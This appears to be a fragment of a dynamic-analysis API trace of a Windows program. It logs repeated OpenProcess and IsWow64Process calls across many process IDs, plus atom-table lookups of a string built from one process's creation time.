	[0106.680] CloseHandle (hObject=0x694) returned 1
	[0106.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.680] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.680] CloseHandle (hObject=0x694) returned 1
	[0106.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.680] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.680] CloseHandle (hObject=0x694) returned 1
	[0106.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.681] CloseHandle (hObject=0x694) returned 1
	[0106.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.681] CloseHandle (hObject=0x694) returned 1
	[0106.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.681] CloseHandle (hObject=0x694) returned 1
	[0106.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.681] CloseHandle (hObject=0x694) returned 1
	[0106.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.681] CloseHandle (hObject=0x694) returned 1
	[0106.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.682] CloseHandle (hObject=0x694) returned 1
	[0106.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.682] CloseHandle (hObject=0x694) returned 1
	[0106.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.682] CloseHandle (hObject=0x694) returned 1
	[0106.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.682] CloseHandle (hObject=0x694) returned 1
	[0106.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.682] CloseHandle (hObject=0x694) returned 1
	[0106.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.682] CloseHandle (hObject=0x694) returned 1
	[0106.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.683] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.683] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.683] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.683] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.683] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.684] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.684] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.684] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.684] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.684] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.684] CloseHandle (hObject=0x694) returned 1
	[0106.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.684] CloseHandle (hObject=0x694) returned 1
	[0106.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.685] CloseHandle (hObject=0x694) returned 1
	[0106.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.685] CloseHandle (hObject=0x694) returned 1
	[0106.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.723] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.723] CloseHandle (hObject=0x694) returned 1
	[0106.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.724] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.724] CloseHandle (hObject=0x694) returned 1
	[0106.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.724] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.724] CloseHandle (hObject=0x694) returned 1
	[0106.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.724] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.724] CloseHandle (hObject=0x694) returned 1
	[0106.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.725] CloseHandle (hObject=0x694) returned 1
	[0106.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.725] CloseHandle (hObject=0x694) returned 1
	[0106.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.725] CloseHandle (hObject=0x694) returned 1
	[0106.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.725] CloseHandle (hObject=0x694) returned 1
	[0106.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.759] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.759] CloseHandle (hObject=0x694) returned 1
	[0106.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.760] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.760] CloseHandle (hObject=0x694) returned 1
	[0106.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.760] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.760] CloseHandle (hObject=0x694) returned 1
	[0106.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.760] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.760] CloseHandle (hObject=0x694) returned 1
	[0106.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.760] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.760] CloseHandle (hObject=0x694) returned 1
	[0106.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.760] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.760] CloseHandle (hObject=0x694) returned 1
	[0106.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.761] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.761] CloseHandle (hObject=0x694) returned 1
	[0106.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.761] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.761] CloseHandle (hObject=0x694) returned 1
	[0106.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.761] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.761] CloseHandle (hObject=0x694) returned 1
	[0106.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.761] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.761] CloseHandle (hObject=0x694) returned 1
	[0106.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.761] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.761] CloseHandle (hObject=0x694) returned 1
	[0106.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.762] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.762] CloseHandle (hObject=0x694) returned 1
	[0106.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.762] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.762] CloseHandle (hObject=0x694) returned 1
	[0106.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.762] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.762] CloseHandle (hObject=0x694) returned 1
	[0106.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.762] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.762] CloseHandle (hObject=0x694) returned 1
	[0106.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.762] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.762] CloseHandle (hObject=0x694) returned 1
	[0106.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.763] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.763] CloseHandle (hObject=0x694) returned 1
	[0106.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.763] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.763] CloseHandle (hObject=0x694) returned 1
	[0106.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.763] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.763] CloseHandle (hObject=0x694) returned 1
	[0106.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.763] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.763] CloseHandle (hObject=0x694) returned 1
	[0106.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.763] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.763] CloseHandle (hObject=0x694) returned 1
	[0106.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.764] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.764] CloseHandle (hObject=0x694) returned 1
	[0106.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.764] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.764] CloseHandle (hObject=0x694) returned 1
	[0106.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.764] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.764] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.765] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.765] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.765] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.765] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.765] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.766] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.766] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.766] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.766] CloseHandle (hObject=0x694) returned 1
	[0106.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.766] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.766] CloseHandle (hObject=0x694) returned 1
	[0106.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.766] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.766] CloseHandle (hObject=0x694) returned 1
	[0106.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.766] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.766] CloseHandle (hObject=0x694) returned 1
	[0106.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.804] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.804] CloseHandle (hObject=0x694) returned 1
	[0106.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.805] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.805] CloseHandle (hObject=0x694) returned 1
	[0106.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.805] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.805] CloseHandle (hObject=0x694) returned 1
	[0106.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.805] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.805] CloseHandle (hObject=0x694) returned 1
	[0106.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.805] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.806] CloseHandle (hObject=0x694) returned 1
	[0106.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.806] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.806] CloseHandle (hObject=0x694) returned 1
	[0106.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.806] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.806] CloseHandle (hObject=0x694) returned 1
	[0106.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.806] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.806] CloseHandle (hObject=0x694) returned 1
	[0106.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.806] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.806] CloseHandle (hObject=0x694) returned 1
	[0106.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.807] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.807] CloseHandle (hObject=0x694) returned 1
	[0106.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.807] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.807] CloseHandle (hObject=0x694) returned 1
	[0106.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.807] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.807] CloseHandle (hObject=0x694) returned 1
	[0106.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.807] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.807] CloseHandle (hObject=0x694) returned 1
	[0106.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.807] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.808] CloseHandle (hObject=0x694) returned 1
	[0106.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.808] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.808] CloseHandle (hObject=0x694) returned 1
	[0106.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.808] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.808] CloseHandle (hObject=0x694) returned 1
	[0106.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.808] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.808] CloseHandle (hObject=0x694) returned 1
	[0106.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.808] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.808] CloseHandle (hObject=0x694) returned 1
	[0106.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.808] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.809] CloseHandle (hObject=0x694) returned 1
	[0106.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.809] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.809] CloseHandle (hObject=0x694) returned 1
	[0106.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.809] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.809] CloseHandle (hObject=0x694) returned 1
	[0106.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.809] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.809] CloseHandle (hObject=0x694) returned 1
	[0106.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.809] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.809] CloseHandle (hObject=0x694) returned 1
	[0106.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.810] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.810] CloseHandle (hObject=0x694) returned 1
	[0106.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.810] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.810] CloseHandle (hObject=0x694) returned 1
